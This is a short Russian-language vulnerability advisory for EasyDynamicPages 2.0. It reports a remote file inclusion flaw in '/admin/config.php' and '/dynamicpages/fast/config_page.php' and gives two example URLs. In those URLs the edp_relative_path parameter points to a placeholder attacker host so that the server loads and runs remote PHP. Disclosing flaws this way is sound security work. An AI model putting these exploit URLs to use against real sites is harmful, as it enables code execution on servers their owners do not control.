Программа: EasyDynamicPages 2.0
Уязвимость включения файла обнаружена в EasyDynamicPages. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.
Файлы '/admin/config.php' и '/dynamicpages/fast/config_page.php' включают файлы без проверки включаемых файлов. В результате удаленный пользователь может представить специально обработанный URL, который выполнит произвольный PHP файл, расположенный на удаленной системе.
Пример:
http://[target]/admin/config.php/ edp_relative_path=http://[attacker]/
http://[target]/dynamicpages/fast/ config_page.php?do=add_page&du=site &edp_relative_path=http://attacker/
